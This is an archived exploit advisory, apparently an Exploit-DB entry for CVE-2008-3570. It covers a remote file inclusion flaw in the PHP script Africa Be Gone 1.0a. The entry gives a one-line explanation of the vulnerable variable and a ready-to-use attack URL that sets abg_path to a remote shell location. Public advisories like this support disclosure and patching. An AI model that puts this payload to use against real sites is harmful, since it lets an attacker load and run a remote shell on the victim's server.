Exploit ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion

[Exploiter]

EDB-ID

6183

Проверка EDB

1. Пройдено

Автор

LO$ER

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-3570

Дата публикации

2008-08-01

=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]